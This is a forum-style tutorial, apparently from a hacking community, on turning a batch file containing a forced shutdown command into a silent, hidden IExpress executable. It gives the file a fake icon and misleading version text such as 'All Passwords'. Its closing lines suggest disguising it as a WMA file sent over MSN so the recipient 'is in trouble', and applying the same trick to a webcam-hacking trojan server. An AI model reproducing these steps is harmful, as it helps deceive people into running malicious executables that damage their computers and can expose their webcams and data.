Well that's all over if you follow my tutorial.
I'm going to explain you how to change the icon of a batch file. (no shortcut)

1. First of all, make a batch file: open notepad > type: shutdown -s -t 20 > save as > choose all files > add the .bat extension and save it.
2. Ok, all messblack members should know this already, but if we want to change the icon, we have to make this batch file executable. Click start > run > type: C:/WINDOWS/system32/iexpress
3. iexpress will open up > select "Create new Self Extraction Directive file. and click next.
4. Select the first option: Extract files and run an installation command and click next.
5. fill in a title (like testt) and click next.
6. Select No prompt and Click next
7. Select Do not display a license. Click next
8. Click add and choose the .bat file that you've created in step 1.
9. Use the drop down control next to "install Program" and choose the .bat file you chose in the previous window. Leave the Post Install Command blanc and click next.
10.Select Hidden and choose next.
11.Select No message and choose next.
12.Browse to the file path you wish to put your batch file in and fill in a name for it at the file name.
13.Select Hide File Extraction Progress Animator from User and click next.
14.Select No restart and click next
15.Select Don't save and click next twice.
16.You're file is being made executable and you're done!
17.Now you finally have made your exe file. But with this icon probably no idiot would ever click on it. So we have to change this icon. Download Resource Hacker, here's the link: http://www.speedyshare.com/761321318.html
18.Once you've downloaded it, open it.
19.click on File > choose the exe you've been working on in the previous steps.
20.You can see a few new files. Choose "icon"
21.Right click on this weird small image of a flower or something > choose Replace resource.
22.Choose Open file with new icon.
23.Put this in the file name: %SystemRoot%system32SHELL32.dll and open.
24.Choose any icon you want.
25.Click "replace"
26.You'll see lots of formats of your icon at the right column. > Click the Version info tab.
27.Click on the flower image.
28.Scroll down to all the values.
29.Change "Win32 Cabinet Self-Extractor" into something like "All Passwords" (NEVER REMOVE THE QUOTES)
30.Change the Microsoft Corporation into whatever you want like: This file contains all the passwords and usernames from Messblack.
31.Select "Compile Script"
32.Click File > Save and you're done!
33.Close your map, open it again and you will see your new exe file with batch and an own icon.

You can make a lookalike wma file and send it through msn. And when the person opens it he's in trouble.
You can do the exact same thing with the Server.exe from Messblack Webcam hack so it will be easier to hack.
